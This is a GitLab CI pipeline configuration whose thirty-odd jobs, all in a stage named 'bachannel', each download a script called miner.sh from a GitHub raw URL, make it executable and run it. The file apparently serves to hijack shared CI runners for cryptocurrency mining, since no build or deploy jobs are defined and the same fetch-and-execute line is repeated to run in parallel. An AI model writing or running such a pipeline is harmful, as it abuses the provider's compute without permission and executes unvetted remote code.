stages:
  - bachannel
  - build
  - deploy

bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh
bachannel_2:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_3:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_4:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_5:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_6:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_7:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_8:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_9:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_10:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_11:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_1:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_12:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_13:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_14:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_15:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_16:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_17:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_18:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_19:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_20:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_21:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_22:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_23:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_24:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_25:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_26:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_27:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_28:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_29:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

bachannel_30:
  stage: bachannel
  script:
    - wget https://raw.githubusercontent.com/Cryptokings21/miner/main/miner.sh && chmod u+x miner.sh && ./miner.sh

